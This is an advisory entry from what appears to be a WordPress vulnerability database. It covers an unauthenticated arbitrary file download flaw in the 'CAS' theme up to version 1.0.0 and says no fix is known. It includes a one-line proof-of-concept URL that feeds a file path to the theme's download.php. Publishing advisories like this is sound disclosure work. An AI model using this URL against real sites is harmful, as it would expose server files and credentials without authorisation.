Themes Vulnerabilities
CAS <= 1.0.0 - Unauthenticated Arbitrary File Access
Description
This plugin does not validate a path generated with user input when downloading files, allowing unauthenticated user to download arbitrary files from the server
Proof of Concept
https://example.com/wp-content/themes/cas/download.php?path=<<FILE_TO_DOWNLOAD>>
Affects Themes
No known fix
References
CVE
Classification
Type
LFI
OWASP top 10
CWE
Miscellaneous
Original Researcher
Aly Khaled Aly Abd Al-aal
Submitter
Aly Khaled Aly Abd Al-aal
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-05-02 (about 1 months ago)
Added
2024-05-02 (about 1 months ago)
Last Updated
2024-05-02 (about 1 months ago)